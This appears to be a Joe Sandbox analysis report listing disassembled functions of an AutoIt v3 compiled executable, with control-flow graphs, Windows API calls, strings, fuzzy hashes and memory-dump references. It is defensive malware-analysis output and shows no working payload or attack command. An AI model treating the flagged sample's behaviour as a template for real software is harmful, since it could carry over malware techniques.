                                          Function 00125E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 712 125e1d-125e54 call b4dc0 715 125e56-125e63 call b502b 712->715 716 125e74-125e86 WSAStartup 712->716 715->716 725 125e65-125e70 call b502b 715->725 718 125e88-125e98 call 107135 716->718 719 125e9d-125edb call c40cd call b4d37 call c402a inet_addr gethostbyname 716->719 726 125ff6-125ffe 718->726 733 125eec-125efc call 107135 719->733 734 125edd-125eea IcmpCreateFile 719->734 725->716 739 125fed-125ff1 call c1cb6 733->739 734->733 735 125f01-125f32 call d0fe6 call c433f 734->735 744 125f34-125f53 IcmpSendEcho 735->744 745 125f55-125f69 IcmpSendEcho 735->745 739->726 746 125f6d-125f6f 744->746 745->746 747 125fa2-125fa4 746->747 748 125f71-125f76 746->748 751 125fa6-125fb2 call 107135 747->751 749 125fba-125fcc call b4dc0 748->749 750 125f78-125f7d 748->750 759 125fd2 749->759 760 125fce-125fd0 749->760 753 125fb4-125fb8 750->753 754 125f7f-125f84 750->754 763 125fd4-125fe8 IcmpCloseHandle WSACleanup call c45ae 751->763 753->751 754->747 757 125f86-125f8b 754->757 761 125f9a-125fa0 757->761 762 125f8d-125f92 757->762 759->763 760->763 761->751 762->753 765 125f94-125f98 762->765 763->739 765->751
                                          APIs
                                          • WSAStartup.WS2_32(00000101,?), ref: 00125E7E
                                          • inet_addr.WSOCK32(?,?,?), ref: 00125EC3
                                          • gethostbyname.WS2_32(?), ref: 00125ECF
                                          • IcmpCreateFile.IPHLPAPI ref: 00125EDD
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F4D
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F63
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00125FD8
                                          • WSACleanup.WSOCK32 ref: 00125FDE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 82b28957bc46b1f812f6bdc51f5bb657cfd3537c3b1b0e414ec64ae30a6ceaa9
                                          • Instruction ID: 2ae96ca462434e41b79f4a3507258ae72e5abbc7fa775f3705f91d817c97b7ca
                                          • Opcode Fuzzy Hash: 82b28957bc46b1f812f6bdc51f5bb657cfd3537c3b1b0e414ec64ae30a6ceaa9
                                          • Instruction Fuzzy Hash: EF51CC316046109FD721EF24ED89B6AB7E1EF48720F144929FA95DB2E2DB70ED50CB42
                                          Function 000C4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 766 c4d83-c4dd1 768 c4e31-c4e33 766->768 769 c4dd3-c4dd6 766->769 768->769 772 c4e35 768->772 770 c4dd8-c4ddf 769->770 771 c4e37 769->771 773 c4ead-c4eb5 PostQuitMessage 770->773 774 c4de5-c4dea 770->774 776 c4e3d-c4e40 771->776 777 1009c2-1009f0 call bc460 call bc483 771->777 775 c4e1a-c4e22 DefWindowProcW 772->775 784 c4e61-c4e63 773->784 780 100a35-100a49 call 112cce 774->780 781 c4df0-c4df2 774->781 783 c4e28-c4e2e 775->783 778 c4e65-c4e8c SetTimer RegisterWindowMessageW 776->778 779 c4e42-c4e43 776->779 813 1009f5-1009fc 777->813 778->784 787 c4e8e-c4e99 CreatePopupMenu 778->787 785 100965-100968 779->785 786 c4e49-c4e5c KillTimer call c5ac3 call b34e4 779->786 780->784 806 100a4f 780->806 788 c4df8-c4dfd 781->788 789 c4eb7-c4ec1 call c5b29 781->789 784->783 792 10096a-10096c 785->792 793 10099e-1009bd MoveWindow 785->793 786->784 787->784 795 100a1a-100a21 788->795 796 c4e03-c4e08 788->796 808 c4ec6 789->808 800 10098d-100999 SetFocus 792->800 801 10096e-100971 792->801 793->784 795->775 803 100a27-100a30 call 108854 795->803 804 c4e0e-c4e14 796->804 805 c4e9b-c4eab call c5bd7 796->805 800->784 801->804 809 100977-100988 call bc460 801->809 803->775 804->775 804->813 805->784 806->775 808->784 809->784 813->775 817 100a02-100a15 call c5ac3 call c59d3 813->817 817->775
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 000C4E22
                                          • KillTimer.USER32(?,00000001), ref: 000C4E4C
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C4E6F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C4E7A
                                          • CreatePopupMenu.USER32 ref: 000C4E8E
                                          • PostQuitMessage.USER32(00000000), ref: 000C4EAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 099a1e4d69443d5ac45087f5f714ddc3ef66537bfc31e62e337bd9e74e7312a9
                                          • Instruction ID: 5af3a1bdc15f9970c66786219d97376190357a29c83df42f5beb7b9dfd1219f9
                                          • Opcode Fuzzy Hash: 099a1e4d69443d5ac45087f5f714ddc3ef66537bfc31e62e337bd9e74e7312a9
                                          • Instruction Fuzzy Hash: C3413A3124860AABDB266F24DC1DFFE36A5F755301F02012DFA46925E3CBB0ACD09762
                                          Function 000C56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00100C5B
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • _memset.LIBCMT ref: 000C5787
                                          • _wcscpy.LIBCMT ref: 000C57DB
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB
                                          • __swprintf.LIBCMT ref: 00100CD1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                          • String ID: Line %d: $AutoIt -
                                          • API String ID: 230667853-4094128768
                                          • Opcode ID: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
                                          • Instruction ID: 0e5dea909fe04ebf0f04a3af1464cfe757adf1c8a0e62854cd1c074a2155165f
                                          • Opcode Fuzzy Hash: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
                                          • Instruction Fuzzy Hash: 27418071408304AAD322EB60DC85FDF77ECAF59350F00062EF199921A3EB70A689C792
                                          Function 000C50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1060 c50db-c514b CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
                                          • ShowWindow.USER32(00000000), ref: 000C513E
                                          • ShowWindow.USER32(00000000), ref: 000C5147
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
                                          • Instruction ID: 5d48e456841b2e45773731bbb6615c5a74b6977080c62458dca4a7b10d055bbc
                                          • Opcode Fuzzy Hash: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
                                          • Instruction Fuzzy Hash: C4F017705442907AEA222723AC08E273E7DE7CAF10F01002EBA18A26B2C67118C0CAB0
                                          Function 00119B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1061 119b16-119b9b call c4a8c call 119cf1 1066 119ba5-119c5c call c4ab2 * 4 call c4a8c call d593c * 2 call c4ab2 call 1196c4 call 118f0e 1061->1066 1067 119b9d 1061->1067 1090 119c73-119c77 1066->1090 1091 119c5e-119c6e call d2f85 * 2 1066->1091 1068 119b9f-119ba0 1067->1068 1070 119ce8-119cee 1068->1070 1092 119c79-119cd1 call 1190c1 call d2f85 1090->1092 1093 119cd8-119cde call d2f85 1090->1093 1091->1068 1104 119cd6 1092->1104 1103 119ce0-119ce6 1093->1103 1103->1070 1104->1103
                                          APIs
                                            • Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4
                                          • _free.LIBCMT ref: 00119C5F
                                          • _free.LIBCMT ref: 00119C66
                                          • _free.LIBCMT ref: 00119CD1
                                            • Part of subcall function 000D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2F99
                                            • Part of subcall function 000D2F85: GetLastError.KERNEL32(00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2FAB
                                          • _free.LIBCMT ref: 00119CD9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 1552873950-2806939583
                                          • Opcode ID: bea6cfab99f27b604f129238a6b40d9f172b21d7b16cda8946752e50d6810ce1
                                          • Instruction ID: ed48b4ae93c48ed083d7e7d1ff91be4e03b36444a068a8801cec0ed34b9fe3ad
                                          • Opcode Fuzzy Hash: bea6cfab99f27b604f129238a6b40d9f172b21d7b16cda8946752e50d6810ce1
                                          • Instruction Fuzzy Hash: BA512CB1904219ABDF289F64DC51BDEBBB9FF48304F0004AEB659A3341DB715A808F59
                                          Function 000D563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1105 d563d-d5656 1106 d5658-d565d 1105->1106 1107 d5673 1105->1107 1106->1107 1108 d565f-d5661 1106->1108 1109 d5675-d567b 1107->1109 1110 d567c-d5681 1108->1110 1111 d5663-d5668 call d8d58 1108->1111 1113 d568f-d5693 1110->1113 1114 d5683-d568d 1110->1114 1123 d566e call d8fe6 1111->1123 1115 d5695-d56a0 call d3010 1113->1115 1116 d56a3-d56a5 1113->1116 1114->1113 1118 d56b3-d56c2 1114->1118 1115->1116 1116->1111 1120 d56a7-d56b1 1116->1120 1121 d56c9 1118->1121 1122 d56c4-d56c7 1118->1122 1120->1111 1120->1118 1125 d56ce-d56d3 1121->1125 1122->1125 1123->1107 1127 d57bc-d57bf 1125->1127 1128 d56d9-d56e0 1125->1128 1127->1109 1129 d5721-d5723 1128->1129 1130 d56e2-d56ea 1128->1130 1131 d578d-d578e call e0dd7 1129->1131 1132 d5725-d5727 1129->1132 1130->1129 1133 d56ec 1130->1133 1140 d5793-d5797 1131->1140 1135 d5729-d5731 1132->1135 1136 d574b-d5756 1132->1136 1137 d57ea 1133->1137 1138 d56f2-d56f4 1133->1138 1141 d5741-d5745 1135->1141 1142 d5733-d573f 1135->1142 1143 d5758 1136->1143 1144 d575a-d575d 1136->1144 1139 d57ee-d57f7 1137->1139 1145 d56fb-d5700 1138->1145 1146 d56f6-d56f8 1138->1146 1139->1109 1140->1139 1147 d5799-d579e 1140->1147 1148 d5747-d5749 1141->1148 1142->1148 1143->1144 1149 d575f-d576b call d4906 call e108b 1144->1149 1150 d57c4-d57c8 1144->1150 1145->1150 1151 d5706-d571f call e0ef8 1145->1151 1146->1145 1147->1150 1153 d57a0-d57b1 1147->1153 1148->1144 1166 d5770-d5775 1149->1166 1154 d57da-d57e5 call d8d58 1150->1154 1155 d57ca-d57d7 call d3010 1150->1155 1163 d5782-d578b 1151->1163 1158 d57b4-d57b6 1153->1158 1154->1123 1155->1154 1158->1127 1158->1128 1163->1158 1167 d57fc-d5800 1166->1167 1168 d577b-d577e 1166->1168 1167->1139 1168->1137 1169 d5780 1168->1169 1169->1163
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                          • Instruction ID: 359a20cdb91b5fd2c9d41ef007e5dddcea010796fe2a7d9b8186742eef747eab
                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                          • Instruction Fuzzy Hash: 71518D30A04B05DBDB248EA99C846AEBBA5AF40326F34876BFC25973D1D770DD508B60
                                          Function 000B52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1170 b52b0-b52c0 1171 edf28-edf2f 1170->1171 1172 b52c6-b52cd 1170->1172 1175 b530c 1171->1175 1176 edf35 1171->1176 1173 edf3a-edf41 1172->1173 1174 b52d3-b52ea PeekMessageW 1172->1174 1173->1175 1179 edf47 1173->1179 1177 b52ec-b52f4 1174->1177 1178 b5313-b5317 1174->1178 1180 b530e-b5312 1175->1180 1176->1173 1181 b52fa-b5306 1177->1181 1182 edfab-edfbc 1177->1182 1183 b531d-b5326 1178->1183 1184 edf95-edf9c 1178->1184 1187 edf4c-edf52 1179->1187 1185 b5368-b536d 1181->1185 1186 b5308-b530a 1181->1186 1183->1187 1188 b532c-b533c call b359e 1183->1188 1184->1182 1185->1180 1186->1175 1189 b536f-b5374 1186->1189 1190 edf86 1187->1190 1191 edf54-edf60 1187->1191 1195 b533e-b534e PeekMessageW 1188->1195 1196 b5352-b5366 TranslateMessage DispatchMessageW 1188->1196 1189->1180 1190->1184 1191->1190 1193 edf62-edf66 1191->1193 1193->1190 1197 edf68-edf7b TranslateAcceleratorW 1193->1197 1195->1177 1198 b5350 1195->1198 1196->1195 1197->1195 1199 edf81 1197->1199 1198->1178 1199->1188
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B534A
                                          • TranslateMessage.USER32(?), ref: 000B5356
                                          • DispatchMessageW.USER32(?), ref: 000B5360
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchTranslate
                                          • String ID:
                                          • API String ID: 1795658109-0
                                          • Opcode ID: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
                                          • Instruction ID: ccd0de85437b80f634a5cdf189ec3fa07e07b54f15ef7627c4907cadebc67bee
                                          • Opcode Fuzzy Hash: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
                                          • Instruction Fuzzy Hash: F031F230508B469EEB70CB64DC48BFA37F89B06741F2400AAE526A66E1D7B199C5E711
                                          Function 000B1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12A8
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12C9
                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
                                          • Instruction ID: 579e05cd345b7700d76c84e119f308bf435e2b1a529e074e131e6485bf6c26fa
                                          • Opcode Fuzzy Hash: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
                                          • Instruction Fuzzy Hash: 21115775610208BFDB218FA5DC84EEEBBF8EF09740F504569F905D7220E2319E509BA4
                                          Function 00113F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00142C4C), ref: 00113F57
                                          • GetLastError.KERNEL32 ref: 00113F66
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00113F75
                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00142C4C), ref: 00113FD2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: 9352b5db44da13feffee49a5a1aaed4155bb58889be898a549ee7ff7e82b21f3
                                          • Instruction ID: d52d2525373dcbb8e9b4e340b6541411ddffc0a0994fbd8ff49067c75a287e77
                                          • Opcode Fuzzy Hash: 9352b5db44da13feffee49a5a1aaed4155bb58889be898a549ee7ff7e82b21f3
                                          • Instruction Fuzzy Hash: D42171749082129F8604DF28C8859EEB7F8AF5A364F10462DF4A5C72A2D7309A86CB53
                                          Function 000C5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 000C5B58
                                            • Part of subcall function 000C56F8: _memset.LIBCMT ref: 000C5787
                                            • Part of subcall function 000C56F8: _wcscpy.LIBCMT ref: 000C57DB
                                            • Part of subcall function 000C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB
                                          • KillTimer.USER32(?,00000001,?,?), ref: 000C5BAD
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C5BBC
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00100D7C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
                                          • Instruction ID: 3ac0681c76b2058f232dbe7a7daaadb855396ead2988f99d8e95a9f6f9039d57
                                          • Opcode Fuzzy Hash: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
                                          • Instruction Fuzzy Hash: 5521B374504B849FE7738B648C95FEABFECAB09305F04048DE6DA56282C7B439C4DB51
                                          Function 000C278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4
                                          • _free.LIBCMT ref: 000FFB04
                                          • _free.LIBCMT ref: 000FFB4B
                                            • Part of subcall function 000C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF
                                          Strings
                                          • Bad directive syntax error, xrefs: 000FFB33
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: Bad directive syntax error
                                          • API String ID: 2861923089-2118420937
                                          • Opcode ID: 5ea66aea755580d61661e69cddaa5161103f63c38e68885330dbad29626d0a97
                                          • Instruction ID: 95bc19183ae9ed83b9badd2256c262b01c6c14252d87633b792626deee124215
                                          • Opcode Fuzzy Hash: 5ea66aea755580d61661e69cddaa5161103f63c38e68885330dbad29626d0a97
                                          • Instruction Fuzzy Hash: 66919D7191421EAFCF14EFA4C891AFDB7B4FF19310F10442AF916AB6A2DB709A05DB50
                                          Function 00119CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C4AB2: __fread_nolock.LIBCMT ref: 000C4AD0
                                          • _wcscmp.LIBCMT ref: 00119DE1
                                          • _wcscmp.LIBCMT ref: 00119DF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
